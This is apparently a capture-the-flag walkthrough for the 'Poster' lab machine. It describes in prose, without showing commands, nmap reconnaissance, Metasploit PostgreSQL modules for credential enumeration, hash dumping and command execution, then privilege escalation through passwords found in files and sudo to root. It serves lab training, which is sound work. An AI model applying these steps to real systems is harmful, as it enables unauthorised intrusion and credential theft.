Poster
Reconnaissance
Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)
Detailed Nmap Scan :
Command Breakdown:
(-sV): Service version
(-sC): Default nmap scripts
(-p): Specifying ports 22,80,5432
(-oN nmap): Saving it into a file called nmap
Enumeration
We are told to go to Metasploit and look for a auxiliary module that allows us to enumerate user credentials, so lets do that.
Lets start Metasploit
Now lets look for the module
Its the 4th one, so lets select it and set the options
Lets now run the enumeration tool
We have the username and password.
Lets answer the next 2 questions as we have the answers
Now we have to find the module that will allow us to execute command with the credentials we just found.
It is number 6, lets select it and set the options
Lets run it.
We have the Version, we can answer the next two questions
Next we have to find the module that will dump user hashes
This time it is number 8, so lets select it and set the options
Lets run it.
We have 6 usernames and their passwords which have been hashed. We can answer the next two questions
Next we have to find the module that will allow an authenticated user to view files of their choosing.
This time it is number 5, lets select it, set the options and run it.
Now , we have to look for the module that allows arbitrary command execution.
It is number 2, lets select it and set the options, we can also answer the next two questions
Lets run it
Looking back at the usernames and credentials we found, we can try to cd into one of the users directory and list the files
This file looks interesting, lets read it.
We have the password, lets ssh into the machine.
Privilege Escalation
We cannot read the user flag and did not have sudo permissions, so lets run LinEnum.sh
on the machine to look for interesting files. First we have to start a http server and download the file on the victim machine.
You can stabilize the shell with this command
Now lets download the file, make sure you are in the tmp folder as other folders do not give permissions to download files.
Lets make the script an executable
Now lets run it.
Long story short, I found nothing and I even tried Linpeas but found nothing interesting, maybe I am not looking at the right thing lol, anyways so I remembered there was a web server running on the machine, so I went to /var/www/html
to look for clues and found this interesting file.
Lets read it.
We have the password for the user Alison
, lets switch users.
We have sudo
permission on this user, so lets see what we can run
Looks like we can run all commands, so lets switch users to root
We can now read the user flag and the root flag.
Last updated